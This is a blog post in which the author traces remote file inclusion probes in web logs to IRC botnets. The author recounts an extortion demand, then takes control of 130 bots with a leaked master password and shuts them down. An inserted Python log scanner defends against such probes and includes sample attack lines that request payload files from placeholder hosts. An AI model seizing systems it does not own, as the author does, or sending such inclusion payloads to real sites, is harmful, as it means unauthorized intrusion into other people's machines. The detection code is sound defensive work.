Web Bots

Since I have started this blog, I have been watching the logs of the website to see how many visitors come and go. I kept noticing that there was a lot of traffic to a page in the site that doesn’t exist any longer. The page used to exist, because I had allowed a World of Warcraft guild to use my hosting company and domain to host a website.

My first thought was that they had signed up for some service that automatically collected DKP (a WoW Guild thing) and displayed it somewhere else…because honestly, why would people continue linking to the same page if there wasn’t anything there? I figured that I would try to track down this “service” and see if I could get them to remove the page from their site.

Whenever one of these entries appeared in my log, they would be followed with something like ?page=http://theirwebsite/directory/txtFile.txt. So, I went to that web address, and got back a Perl script. Just from the variables in the first part of the file, I could tell that the script would be connecting to an IRC server. It had a server address, port, server password, channel name, channel password, and then a few other things that I didn’t know what they were.
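The `?page=http://...` entries described above are the signature of a remote file inclusion probe: a query parameter whose value is itself a URL. As an added example (not part of the original post), this Python code scans access-log lines for them and counts which payload hosts recur; the Combined Log Format layout, the sample lines, the paths and the host names are constructed assumptions.

```python
import re
from collections import Counter
from urllib.parse import urlsplit, parse_qsl

# Client IP, request line and status from a Common/Combined Log Format entry.
REQUEST_RE = re.compile(
    r'^(?P<ip>\S+) .*?"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})')
REMOTE_SCHEMES = ("http://", "https://", "ftp://")

def find_remote_include_probes(lines):
    """Return (ip, path, param, remote_url, status) for every query parameter
    whose decoded value is itself a remote URL."""
    hits = []
    for line in lines:
        m = REQUEST_RE.match(line)
        if not m:
            continue  # not in the expected log format
        target = urlsplit(m["target"])
        # parse_qsl percent-decodes values, so page=http%3A%2F%2F... is caught too
        for param, value in parse_qsl(target.query, keep_blank_values=True):
            value = value.strip()
            if value.lower().startswith(REMOTE_SCHEMES):
                hits.append((m["ip"], target.path, param, value, int(m["status"])))
    return hits

def payload_hosts(hits):
    """Count probes per host serving the included file."""
    return Counter(urlsplit(url).hostname for _, _, _, url, _ in hits)

# Constructed sample lines (documentation IP ranges and .example hosts).
SAMPLE_LOG = [
    '203.0.113.7 - - [12/Mar/2008:04:11:52 +0000] "GET /guild/dkp.php?page=http://payload.example/directory/txtFile.txt HTTP/1.1" 404 512 "-" "-"',
    '198.51.100.23 - - [12/Mar/2008:04:13:09 +0000] "GET /guild/dkp.php?page=http%3A%2F%2Fpayload.example%2Fdirectory%2FtxtFile.txt HTTP/1.1" 404 512 "-" "-"',
    '192.0.2.44 - - [12/Mar/2008:05:02:31 +0000] "GET /index.php?p=12 HTTP/1.1" 200 8231 "-" "-"',
    '192.0.2.44 - - [12/Mar/2008:05:02:40 +0000] "GET /index.php?page=about HTTP/1.1" 200 4410 "-" "-"',
    'this line is not a log entry',
    '203.0.113.90 - - [12/Mar/2008:06:45:00 +0000] "GET /guild/dkp.php?id=3&page=HTTP://Other.example/x.txt HTTP/1.1" 404 512 "-" "-"',
]

if __name__ == "__main__":
    for hit in find_remote_include_probes(SAMPLE_LOG):
        print(hit)
    print(payload_hosts(find_remote_include_probes(SAMPLE_LOG)).most_common())
```

A 404 on a hit means the targeted page is gone, as in this post; a hit answered with 200 is the one to investigate, since the script may actually be including the parameter.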

I connected to the IRC server and entered the channel, and quickly realized that I had stumbled into a bot network. I tried talking in the channel (at this point, I was going to stick to my original story) but I didn’t have a voice. So I messaged the only real looking name in the room. He didn’t respond. Figuring maybe they were on different timezones, I just quit the server and went about my business.

Of course then I decided to start looking at the script and seeing what it would do. I quickly discovered that it would accept commands from anyone in the room. The only thing you had to do was type “.user [password]” to authenticate yourself as its master. The password was right there in the file too. So I logged back on to the server, and into the channel just in time to see two people in the room copying and pasting my earlier private messages (where I was basically asking if they could remove me from their list).

I messaged him again, and they gave me a voice in the channel. I started explaining how I found them, and how I wanted them to remove me from their list. They then started telling me how I needed to pay them $1,000 USD, or they would shut me down for several days. To that threat, I simply responded “OH NOES!! You are going to take down my blog!?!” After that, “stupid american” things started flying out of them, and crap like that.

That just motivated me. I didn’t know if the commands I found would work or not, and didn’t get a chance to find out on them because I had logged in from my house. I found another bot network, and logged on through another shell account that would make it a little harder for me to be traced (like I said, I get bombarded with these attempted website hacks daily…I have a large list of scripts to choose from). When I got into this channel, there were 130 bots in there. I typed “.user [password]” and instantly all 130 of them reply in the channel with something like “User Accepted.” I then type “.dns” and “.info” and they all respond.

Then I typed “.die” and a great feeling rushed over me as 130 clients disconnected. Then the only other person left in the channel said something to me that was in Spanish…the only word I could comprehend was the last…which was clearly a curse word. I responded with “?”. I stuck around for a while to see how quickly they would come back online. After 5 minutes, only 2 clients joined the channel, and it could be assumed that those were new clients and the old clients just completely stopped running their script.

Then I went to the “stupid american” haters and showed them I wasn’t so stupid (the only difference is I had to /msg each and every bot since the channel was moderated and I didn’t have a voice). I fully expect my Internet to come to a grinding halt soon, or for my website to go offline. The only thought that comforts me is knowing that they are probably just little script kiddies that weren’t smart enough to do some form of encryption. There are quite a few scripts that I have found that at least have the majority of their script gdeflated with just a small amount of code actually visible to re-inflate it. So far I’m just too lazy to re-inflate them myself. I probably just shouldn’t mess with them…they might be smart enough to do something about it.
